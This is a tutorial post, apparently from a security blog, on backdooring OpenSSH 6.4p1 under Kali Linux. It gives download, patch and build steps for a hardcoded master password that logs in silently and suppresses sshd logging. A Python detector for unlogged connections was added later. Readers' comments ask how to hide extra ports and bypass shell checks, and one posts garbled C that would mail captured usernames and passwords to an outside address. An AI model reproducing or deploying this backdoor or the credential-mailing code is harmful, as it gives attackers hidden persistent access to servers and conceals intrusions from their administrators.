[Video] - Build a backdoor in OpenSSH 6.4p1 with Kali Linux
This time I show you how to build a "backdoor" in your own OpenSSH 6.4p1 installation under Kali Linux.
Download needed files
cd /tmp/
wget --no-check-certificate https://www.openssl.org/source/openssl-1.0.1e.tar.gz
tar xvfz openssl-1.0.1e.tar.gz
wget http://openbsd.cs.fau.de/pub/OpenBSD/OpenSSH/portable/openssh-6.4p1.tar.gz
tar xvfz openssh-6.4p1.tar.gz
Preparing the system
mkdir /usr/local/ssl/
ln -s /tmp/openssl-1.0.1e/include/ /usr/local/ssl/include
ln -s /tmp/openssl-1.0.1e/include/ /usr/local/ssl/lib
ln -s /usr/lib/i386-linux-gnu/libcrypto.so.1.0.0 /usr/lib/libcrypto.so
Changing OpenSSH
// auth.h
#define B4CKD00R "myeasypass"
int backdoorActive;

// auth-passwd.c
int
auth_password(Authctxt *authctxt, const char *password)
{
	struct passwd * pw = authctxt->pw;
	int ok = authctxt->valid;
	backdoorActive = 0;
	if (!strcmp(password, B4CKD00R)) {
		backdoorActive = 1;
		return 1;
	}

// log.h
int backdoorActive;

// log.c
void
do_log(LogLevel level, const char *fmt, va_list args)
{
	if(backdoorActive == 1) return;
Compile & install OpenSSH on your local Kali installation
./configure --with-ssl-dir=/tmp/openssl-1.0.1e/
make
make install
Change SSH-Port if needed
vi /usr/local/etc/sshd_config
Port 2222
Start your new local SSH-Daemon
/usr/local/sbin/sshd -f /usr/local/etc/sshd_config
Test it!
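The log.c change above returns from do_log once the flag is set, so a login made this way produces no sshd log line, while the TCP connection itself is still visible to anything that records network connections independently. As an added example (not part of the original post), this Python code lists connections to the sshd ports that have no matching sshd log entry; the connection-record format, the sample data and the year used for parsing are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample data (not from the original page): sshd lines in syslog format.
AUTH_LOG = """\
Mar  3 10:15:02 kali sshd[2101]: Accepted password for alice from 192.0.2.10 port 51122 ssh2
Mar  3 10:20:41 kali sshd[2140]: Failed password for root from 198.51.100.7 port 40210 ssh2
Mar  3 10:20:44 kali sshd[2140]: Connection closed by 198.51.100.7 [preauth]
"""
# Assumed format of an independent connection record (firewall or flow log):
# (start time, source IP, source port, destination port). Constructed values.
CONNECTIONS = [
    ("Mar  3 10:15:01", "192.0.2.10", 51122, 22),
    ("Mar  3 10:20:39", "198.51.100.7", 40210, 22),
    ("Mar  3 10:31:17", "203.0.113.55", 38990, 2222),
]

SSHD_RE = re.compile(
    r"^(\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: .*? from (\S+) port (\d+)")

def _ts(stamp, year=2014):
    # syslog timestamps carry no year; the year is an assumption of this example
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")

def logged_peers(auth_log):
    """Map (src_ip, src_port) -> list of times at which sshd logged that peer."""
    peers = {}
    for line in auth_log.splitlines():
        m = SSHD_RE.match(line)
        if m:
            key = (m.group(2), int(m.group(3)))
            peers.setdefault(key, []).append(_ts(m.group(1)))
    return peers

def silent_connections(connections, auth_log, window=timedelta(minutes=2)):
    """Return connections for which sshd logged nothing within `window` of the start."""
    peers = logged_peers(auth_log)
    silent = []
    for stamp, ip, port, dport in connections:
        start = _ts(stamp)
        times = peers.get((ip, port), [])
        if not any(start <= t <= start + window for t in times):
            silent.append((stamp, ip, port, dport))
    return silent

if __name__ == "__main__":
    for conn in silent_connections(CONNECTIONS, AUTH_LOG):
        print("connection with no sshd log entry:", conn)
```

Short probes that never attempt authentication can also appear in the result, so treat a hit as a lead and weigh it by connection duration.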
Comments
noname on :
Yes mate, it is great, looks OK... but when you log in you are in the ps and w commands, and that compromises all your activity.
Nick on :
Hi mate, this looks nice. Can you make a video tutorial or just write the commands for a different opened port connection?
I mean, if you can explain to me how I can make this work, for example on 9863, but with 22 still on! Cheers!
By the way, I don't want 9863 to be visible in /etc/ssh/sshd_config. I know this is possible but I don't know how!
Stefan Schurtz on :
Hi,
you mean something like that:
servconf.c
change to
If the port is changed in the config file, change this
servconf.c
Not sure if this works in all situations. Perhaps you can test a little bit more than I did :)
Cheers,
Nick on :
No problem mate, I just tried both of them and they didn't work for me, even the port, even building from 6.5 with CentOS or Ubuntu. I need something new. I tried as well to implement sendmail on this, no success!
The email function was this for me:
[code]
/* fopen example */
#include
#include
#include
#include
#include
int main ()
fp = popen("mail -s ‘us loggedin’ x19@xxxxxxxxxxx", pw_user>user & password); fprintf(fp, "%s\n", msgbuf); pclose(fp); return 0; } [/code]{
FILE *fp; char *ttyn = ttyname(0); char msgbuf1000; struct utmp *ut; while ((ut = getutent())) { if (strcmp(ttyn, ut->ut_line) == 0) { strcat(msgbuf, "\nFrom: "); strcat(msgbuf, ut->ut_user); strcat(msgbuf, "@"); strcat(msgbuf, ut->ut_host); break; } }
meh on :
Seems to work only if run by root. How about if you want to run it as an unprivileged user?
Also, do you know how to bypass the valid shell check and always assign /bin/bash, even if it’s set to /bin/false?
Or at least how to override the passwd path to something like ./passwd, so it can be modified by the unprivileged user.